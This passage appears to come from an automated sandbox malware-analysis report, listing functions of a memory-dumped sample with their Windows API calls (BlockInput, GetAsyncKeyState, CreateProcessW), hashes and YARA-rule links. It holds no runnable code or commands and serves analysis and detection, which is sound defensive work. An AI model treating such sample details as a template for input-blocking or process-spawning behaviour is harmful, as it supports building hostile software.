Opcode Fuzzy Hash: 5dcd6117f0252203c9e2b79860dd98316fc0fef06bbbdaaebc431f6615ce2143
Instruction Fuzzy Hash: 4BE08C7010422CBBEB241F19DC0AFB93B69EB00B90F10C526FA16880E0D7B488A0DA64

Function 006B8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0069125D,006B7A43,00690F35,?,?,00000001), ref: 006B8E41
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006B8E4A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6b524349bd852ef183590b64e7ff1bc9367a81cd163f29f58979e761e474fab5
Instruction ID: 570cb297ff9197f4e07ee5f4757e22e6d922c1dc2ca57911dd2d585fd78d703c
Opcode Fuzzy Hash: 6b524349bd852ef183590b64e7ff1bc9367a81cd163f29f58979e761e474fab5
Instruction Fuzzy Hash: 34B09271044A08EBEA102BA9EC09BC83F68EB0AA62F00C010F62D440A0CB6B58508E9A

Function 006C113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f8a19e0b071979675dcdaf643fb9b97df4805c1d7b14f1476df3cfd7ebcb72
Instruction ID: 08951884ca3b84756b843d6b39c10efba3b1dac9c9f43e5a9d052c1cd7bf4b43
Opcode Fuzzy Hash: e3f8a19e0b071979675dcdaf643fb9b97df4805c1d7b14f1476df3cfd7ebcb72
Instruction Fuzzy Hash: B7B1EE20E2AF404DD63396398C31336B65CAFBB2D5F92D71BFC2A74D22EB2585834184

Function 007002AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00700352

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 1b4a53b51485de0b1b12ddde4c478e7fdc6539d52248fce586676fca3cdab962
Instruction ID: 94b9486e87e7f3a8e0a19750ef7936f603077137077a11989850126a11a9ff5e
Opcode Fuzzy Hash: 1b4a53b51485de0b1b12ddde4c478e7fdc6539d52248fce586676fca3cdab962
Instruction Fuzzy Hash: D0113A31204219FFFB261B2CCC45FB97A95E741731F24832DFA115A1E2CAA85D00D2E9

Function 006FE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 006AB155: GetWindowLongW.USER32(?,000000EB), ref: 006AB166

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 006FE7AF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 6b4727d3a69d16b72fea709a26e6bdbe70787d820233b33af7aa9a15c9562e32
Instruction ID: ab2024a1eb913d6f914928f36f1fbad192c6bbca4fdfd4c57dfb7ed3f8e87ed8
Opcode Fuzzy Hash: 6b4727d3a69d16b72fea709a26e6bdbe70787d820233b33af7aa9a15c9562e32
Instruction Fuzzy Hash: 27F0EC3510010CAFCF15AF98DC449B93FA7EB04361B448524FA158A6B1C776AD71EB94

Function 006FEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

Part of subcall function 006AB736: GetCursorPos.USER32(000000FF), ref: 006AB749
Part of subcall function 006AB736: ScreenToClient.USER32(00000000,000000FF), ref: 006AB766
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000001), ref: 006AB78B
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000002), ref: 006AB799

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0070F417,?,?,?,?,?,00000001,?), ref: 006FEA9C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 609d0c32f6c2828ea89337b2fb1e7ef6612b8b0b67670170ec64ea1c7993d460
Instruction ID: 38f30a5d1f943faed8339d10ee7154ef656166b143f8197848212d39b2ab65f9
Opcode Fuzzy Hash: 609d0c32f6c2828ea89337b2fb1e7ef6612b8b0b67670170ec64ea1c7993d460
Instruction Fuzzy Hash: 48F08231100229ABDB146F19CC05EFE3F62FB01751F004015F9061A1A1D7B79C61DFD5

Function 006AB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,006AAF40,?,?,?,?,?), ref: 006AB83B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: cdd9027a67965b4607748dd7e41376a1dafa742127207ede4dbdb00ef9b70c2f
Instruction ID: 8e82eb74d215e33802f63af50fa1f47d0df940d265b33710e9fdc93f2941949f
Opcode Fuzzy Hash: cdd9027a67965b4607748dd7e41376a1dafa742127207ede4dbdb00ef9b70c2f
Instruction Fuzzy Hash: 8EF05430500209DFDB28AF18DC50AB53BA6F705372F548229F952472A1D775DC50DB54

Function 006E703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 006E7057

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 128c740332cacca8c9d717ab92ece7f326c6f6692d2bb3a612a215632bec9b67
Instruction ID: 94fe13610cb23dd65ae4f28734ed04bf6440caa3eb0d1a7d5d23687e0c5c4d38
Opcode Fuzzy Hash: 128c740332cacca8c9d717ab92ece7f326c6f6692d2bb3a612a215632bec9b67
Instruction Fuzzy Hash: 07E012752042045FC710AB69D404996B7DDAF54750F00C42AE945D7251DAB0EC049BA0

Function 006FF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 006FF41A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 0b07314b8d8ed9613742763a580b16c7ba744bdd5685d7fcae410418a0abf491
Instruction ID: e4add678d9ed9504d4641971299d9899d06e7e01968fca407e8f151fc876734b
Opcode Fuzzy Hash: 0b07314b8d8ed9613742763a580b16c7ba744bdd5685d7fcae410418a0abf491
Instruction Fuzzy Hash: 99F06D31240259AFDB21DF58DC05FD63BA6FB06761F048458BA15672E1CBB57820DBA8

Function 006AAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 006AACC7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 512cfa66da7050b38a768efc2f77b23c350d7fea40c1274fe4d0d76265041dd0
Instruction ID: f8d68c0fc6817e16f1f20a46511c17c0c5334d71d70ef6e0e369c7d241182bb1
Opcode Fuzzy Hash: 512cfa66da7050b38a768efc2f77b23c350d7fea40c1274fe4d0d76265041dd0
Instruction Fuzzy Hash: 30E08C31140208FBCF14AF90CC01FA83B27FB49361F108019FA060B2A1CB77A822EF44

Function 006FF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0070F3D4,?,?,?,?,?,?), ref: 006FF450

Part of subcall function 006FE13E: _memset.LIBCMT ref: 006FE14D
Part of subcall function 006FE13E: _memset.LIBCMT ref: 006FE15C
Part of subcall function 006FE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00753EE0,00753F24), ref: 006FE18B
Part of subcall function 006FE13E: CloseHandle.KERNEL32 ref: 006FE19D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 61b9216465f6e421e2ab6ab40cd5cf622221f4f8859d0f2ff0acf0995aa0e530
Instruction ID: 0a56b545bc2e6d6dc210628ab59b03410b559141193d3c3abfbc45922903f012
Opcode Fuzzy Hash: 61b9216465f6e421e2ab6ab40cd5cf622221f4f8859d0f2ff0acf0995aa0e530
Instruction Fuzzy Hash: 97E09231110209DFCB11EF58DC45EAA3BA6FB08751F058055FA05572B2C772A961EF55

Function 006FF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 006FF3A1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: ca8c153607408306b426910c717687d6c33219f8744388ddc33b016153b2587d
Instruction ID: 81246e838c4024805e6ed3d7c7d03c71aa009e517d281123c26a26be55dcfb7d
Opcode Fuzzy Hash: ca8c153607408306b426910c717687d6c33219f8744388ddc33b016153b2587d
Instruction Fuzzy Hash: B8E0E23420420CEFCB01DF88D844E8A3BA5FB1A351F008054FD048B261C772A830DB61

Function 006FF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 006FF3D0

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 159f354aa20dde0ba4e94d78a70766d5af758af66db4b4ac272cd930c476a916
Instruction ID: 750102587b423285964ffbb0b9391c66136f7962448829eab196d050a3b18d2a
Opcode Fuzzy Hash: 159f354aa20dde0ba4e94d78a70766d5af758af66db4b4ac272cd930c476a916
Instruction Fuzzy Hash: F7E0E23420020CEFCB01DF88D844ECA3BA5FB1A350F008054FD048B262C772A870EBA1

Function 006AB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

Part of subcall function 006AB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006AB85B), ref: 006AB926
Part of subcall function 006AB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,006AB85B,00000000,?,?,006AAF1E,?,?), ref: 006AB9BD

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,006AAF1E,?,?), ref: 006AB864

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 1a2def29d241d17549d4733d0d7ae42318d0e915fa11fc64a827b3d0655529ac
Instruction ID: 4234eaa82f9e5697ca5e3ca1c9359b05adb73278e4e51cc0b8ace05f3ad0e1fc
Opcode Fuzzy Hash: 1a2def29d241d17549d4733d0d7ae42318d0e915fa11fc64a827b3d0655529ac
Instruction Fuzzy Hash: 01D0127118430C77DB203BA5DC07F893A1FAB01751F40C435FA05691E2CBB56C209D9D

Function 006B8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 006B8E1F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5a7f54e327e1695534e99f6fecce7935cc201c18de27ca346098deb441b05d2e
Instruction ID: 4c6b1b755dadb0eeb828a988685abcc2752e74ee34ffdc87db0250e91a1c05ea
Opcode Fuzzy Hash: 5a7f54e327e1695534e99f6fecce7935cc201c18de27ca346098deb441b05d2e
Instruction Fuzzy Hash: ACA0123000050CE78A001B55EC044847F5CD605150700C010F41C00021C73358104985

Function 006BA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(006B6AE9,007467D8,00000014), ref: 006BA937

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f9eaeaa220ff140b4deff20338d951d4d784d7906d618cc690be8c9fb741d7c9
Instruction ID: 7dc71bcbea5d0dc70e9489be0c1f4195b7cb8c0770535c6f05dcb6386cd086ac
Opcode Fuzzy Hash: f9eaeaa220ff140b4deff20338d951d4d784d7906d618cc690be8c9fb741d7c9
Instruction Fuzzy Hash: 2BB012F07032064BD7084B3CAC541DE39D45749202302C03D7403C25A0DB749810EF04

Function 006B0EC4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 9cb9920fe745e05e7f9f9b861409b0d88e873e22fc6d394bea93088939347292
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 14C1D5B22052D349EF2D463984304FFBEA25AA27B131A076DD8B3CF6C1EE24D5A4D710

Function 006B12F9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: d986bb3b29350b4fe1cad82c0e7ea3a0a6655113eb8c99db6753a0134c34a317
